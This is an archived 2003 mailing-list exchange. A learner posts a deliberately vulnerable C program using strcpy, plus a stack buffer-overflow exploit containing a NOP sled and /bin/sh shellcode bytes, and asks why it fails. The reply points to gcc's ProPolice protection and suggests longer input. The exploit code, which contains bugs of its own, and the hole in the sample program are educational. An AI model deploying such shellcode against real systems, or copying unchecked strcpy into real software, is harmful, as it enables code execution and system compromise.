Vulnerability Development mailing list archives
Re: Why doesnt work?
From: "Daniel Bartlett" <dan () lockedbox net>
Date: Thu, 9 Oct 2003 03:13:00 +0100 (BST)
I wonder which version of gcc your using if gcc at all. I wonder this because in new releases of gcc contain some patches to help protect from buffer overflows, propolice. I found when expirementing with bufferflows of a similar simpile c proggie needed the amount of data over the buffer size to be approx 20-30 chars more than the size of the buffer. Have you tried with a huge amount of data, like say double? Cheers, Daniel. On 10/8/2003, "BORJA RUIZ CASTRO MORON" <padre () fedro ugr es> wrote:
Hi! Im trying 2 xploit a little code: ----------------------------------------------------------- // foo.c, vuln proggy // compile gcc -o foo foo.c // #include <stdio.h> #include <string.h> main (int argc,char **argv){ char buffer[1024]; if (!argc) { fprintf(stdout,"No argument found."); exit(-1); } strcpy(buffer,argv[1]); } ------------------------------------------------------------------------- We see,if argv[1]>1024, It will generate a segmentation fault,it isnt? So,here the exploit code: // Exploit code 4 foo.c // #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #define NOP 0x90 main (void) { char buffer[1032]; /* 1024 + 8 */ int offset,i,ret; char *ptr,*ptr2; char shellcode[]= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // movl %esp,%ebx "\x99" // cltd "\x52" // pushl %edx "\x53" // pushl %ebx "\x89\xe1" // movl %esp,%ecx "\xb0\x0b" // movb $0xb,%al "\xcd\x80" // int $0x80 ; long get_sp(){ __asm__ ("movl %esp,%eax"); } help () { fprintf ("Usage: %s <offset>\n",argv[0]); exit(0); } if (!argc) help(); offset=atoi(argv[1]); for (i=0;i<strlen(buffer);i++) { buffer[i]=0x00; } ptr=buffer; for (i=0;i<(strlen(buffer)-strlen(shellcode));i++) { *(ptr++)=NOP; } for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; } ptr2=(long *)ptr; for(i=0;i<8;i++) { *(ptr2++)=get_sp()+offset; } execl("./foo", "foo",buffer,0); } //EOF -------------------------------------------------------- This exploit doesnt work,can you help me? why it doesnt work? ARggg!!! Sorry 4 my poor english. Greetings from spain!
Current thread:
- Why doesnt work? BORJA RUIZ CASTRO MORON (Oct 08)
- Re: Why doesnt work? Daniel Bartlett (Oct 09)
- <Possible follow-ups>
- Re: Why doesnt work? Vade 79 (Oct 10)